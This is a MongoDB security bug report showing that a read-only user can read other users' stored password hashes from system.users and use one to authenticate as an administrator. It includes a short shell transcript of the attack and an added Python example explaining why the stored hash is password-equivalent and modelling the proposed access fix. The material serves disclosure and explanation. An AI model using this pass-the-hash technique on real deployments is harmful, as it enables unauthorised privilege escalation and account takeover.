- Type: Bug
- Resolution: Duplicate
- Priority: Critical - P2
- None
- Affects Version/s: None
- Component/s: Security
- None
- Environment: all
- ALL
A read-only user can get write priority by accessing other users' pwd hash.
Sample:
> db.system.users.find()
> db.$cmd.findOne({getnonce:1})
{ "nonce" : "9892be9572e9851e", "ok" : 1 }
> db.runCommand({ authenticate : 1, user : "sa", nonce : "9892be9572e9851e", key : hex_md5("9892be9572e9851e"+"sa"+"84c689ded211fb631fd5f5dedc5d4539") })
{ "ok" : 1 }

is related to
- SERVER-4692 Read-only users should be denied access to system.users collection - Closed
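
Why the transcript in the description succeeds, as an added example (not part of the original report and not MongoDB's code): the server checks the `key` against the stored `pwd` value itself, so that value is password-equivalent and read access to `system.users` has to be restricted, as SERVER-4692 proposes. The function names, the `may_read` policy hook and the sample account are assumptions constructed for illustration; the `pwd` derivation shown is the legacy md5(user + ":mongo:" + password) scheme.

```python
import hashlib
import hmac

def hex_md5(text: str) -> str:
    """Equivalent of the mongo shell helper used in the report."""
    return hashlib.md5(text.encode("utf-8")).hexdigest()

def legacy_pwd(user: str, password: str) -> str:
    """Value stored in the pwd field of system.users under the legacy scheme."""
    return hex_md5(f"{user}:mongo:{password}")

def auth_key(nonce: str, user: str, pwd: str) -> str:
    """Client response; the same expression as in the report's transcript."""
    return hex_md5(nonce + user + pwd)

def server_verify(users: dict, nonce: str, user: str, key: str) -> bool:
    """Server-side check: only the stored pwd value enters the comparison."""
    doc = users.get(user)
    if doc is None:
        return False
    return hmac.compare_digest(auth_key(nonce, user, doc["pwd"]), key)

def may_read(collection: str, read_only: bool) -> bool:
    """Hypothetical policy hook modelling SERVER-4692."""
    return not (read_only and collection == "system.users")

# Constructed sample account; the nonce is the one quoted in the report.
USERS = {"sa": {"pwd": legacy_pwd("sa", "constructed-password"), "readOnly": False}}
NONCE = "9892be9572e9851e"

def demo() -> dict:
    from_password = auth_key(NONCE, "sa", legacy_pwd("sa", "constructed-password"))
    from_stored = auth_key(NONCE, "sa", USERS["sa"]["pwd"])  # password never used
    bad = auth_key(NONCE, "sa", "0" * 32)  # a value that is not the stored pwd
    return {
        "password_holder_accepted": server_verify(USERS, NONCE, "sa", from_password),
        "stored_value_accepted": server_verify(USERS, NONCE, "sa", from_stored),
        "wrong_value_rejected": not server_verify(USERS, NONCE, "sa", bad),
        "read_only_sees_system_users": may_read("system.users", read_only=True),
        "read_only_sees_other_data": may_read("orders", read_only=True),
    }

if __name__ == "__main__":
    for name, value in demo().items():
        print(f"{name}: {value}")
```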